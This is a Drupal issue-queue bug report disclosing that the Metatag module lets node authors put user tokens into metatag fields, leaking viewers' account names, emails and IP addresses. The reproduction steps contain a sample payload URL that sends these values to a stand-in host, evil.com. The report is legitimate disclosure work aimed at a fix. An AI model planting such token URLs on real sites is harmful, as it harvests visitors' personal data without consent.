Active
Project:
Metatag
Version:
2.2.0
Component:
Code
Priority:
Normal
Category:
Bug report
Assigned:
Unassigned
Issue tags:
Reporter:
Created:
29 Apr 2026 at 19:23 UTC
Updated:
29 Apr 2026 at 19:23 UTC
Jump to comment: Most recent
Background information
This was originally reported as a private security issue, but has been approved for handling in the public queue by the Drupal Security Team.
- security.drupal.org private issue: https://git.drupalcode.org/security/185024-metatag-security/-/work_items/1
(included for reference. Please do not report access denied as an error.)
Problem/Motivation
The ability to use tokens in metatag fields could allow a user that can create nodes to gain some info about users loading this node.
Steps to reproduce
- Create a bundle with a metatag field.
- As a user with the permission to create nodes in this bundle (but not the view user email addresses permission), create a node with this value in Default icon:
http://evil.com/?user=[current-user:account-name]&email=[current-user:mail]&ip=[current-user:ip-address] - Every-time a logged-in user loads this node, you get sent their e-mail address.
Other tags could be used for this.
I suppose this can be mitigated with metatag_extended_perms.
(Tokens currently don't have access checks: #3489852: Token replace system has no access checking
But even if this was fixed, users would have access to their own e-mail address.)
Comments